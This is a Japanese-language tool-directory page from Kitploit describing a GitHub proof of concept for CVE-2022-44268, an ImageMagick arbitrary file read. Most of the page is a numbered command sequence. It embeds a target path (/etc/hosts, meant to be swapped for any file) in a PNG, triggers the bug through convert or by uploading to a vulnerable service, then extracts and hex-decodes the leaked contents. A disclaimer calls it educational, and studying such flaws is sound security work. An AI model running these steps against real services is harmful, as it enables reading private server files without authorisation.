Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC — CVE-2022-44268 ImageMagick 任意ファイル読み取り - ペイロード生成ツール | Kitploit
ツール/GitHubGitHub/duc-nt/cve-2022-44268-imagemagick-arbitrary-file-read-poc
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubduc-nt/cve-2022-44268-imagemagick-arbitrary-file-read-poc

CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC

CVE-2022-44268 ImageMagick 任意ファイル読み取り - ペイロード生成ツール

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
275373年前Kitploit レビュー済み

CVE-2022-44268 ImageMagick 任意ファイル読み取り PoC

CVE-2022-44268 ImageMagick 任意ファイル読み取り PoC 用ペイロードジェネレーター

このプロジェクトは教育目的のみで作成されており、法律違反や個人的な利益のために使用することはできません。

このプロジェクトの作者は、このプロジェクトの素材によって引き起こされる可能性のあるいかなる損害についても責任を負いません。

オリジナルの発見: https://www.metabaseq.com/imagemagick-zero-days/

使い方:

依存関係のインストール:

1. $ apt-get install pngcrush imagemagick exiftool exiv2 -y

読み取りたいファイル名を以下で変更してください:

2. $ pngcrush -text a "profile" "/etc/hosts" vjp.png

すべてが正常に動作したことを確認:

3. $ exiv2 -pS pngout.png

convert を使用するか、画像を脆弱なサービスにアップロードして PoC をトリガー:

4. $ convert pngout.png gopro.png

読み取られたファイルの内容を表示:

5. $ identify -verbose gopro.png

コンテンツを復号:

6. $ python3 -c 'print(bytes.fromhex("23202f6574632f686f7374730a3132372e302e302e31096c6f63616c686f73740a0a232054686520666f6c6c6f77696e67206c696e65732061726520646573697261626c6520666f7220495076362063617061626c6520686f7374730a3a3a3109096c6f63616c686f7374206970362d6c6f63616c686f7374206970362d6c6f6f706261636b0a666630323a3a3109096970362d616c6c6e6f6465730a666630323a3a3209096970362d616c6c726f75746572730a6475636e740a").decode("utf-8"))'

デモ

Ubuntu 22.04 とデフォルトでインストールされた imagemagick でテスト済み。

ツールをダウンロード